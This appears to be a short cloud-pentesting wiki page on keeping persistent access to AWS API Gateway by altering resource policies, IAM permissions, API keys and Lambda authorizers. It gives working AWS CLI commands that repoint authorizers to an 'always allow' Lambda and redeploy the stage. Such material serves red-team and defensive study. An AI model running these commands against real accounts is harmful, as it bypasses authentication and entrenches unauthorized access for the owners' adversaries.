AWS - API Gateway Persistence

API Gateway

For more information go to:

{{#ref}}
../../aws-services/aws-api-gateway-enum.md
{{#endref}}

Resource Policy

Modify the resource policy of the API gateway(s) to grant yourself access to them

Modify Lambda Authorizers

Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
Or just remove the use of the authorizer.

If you have control-plane permissions to create/update an authorizer (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) you can also repoint the authorizer to a Lambda that always allows.

REST APIs (changes typically require a deployment):

REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"

HTTP APIs / apigatewayv2 (often takes effect immediately):

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

IAM Permissions

If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
Or just remove the use of the authorizer.

API Keys

If API keys are used, you could leak them to maintain persistence or even create new ones.\
Or just remove the use of API keys.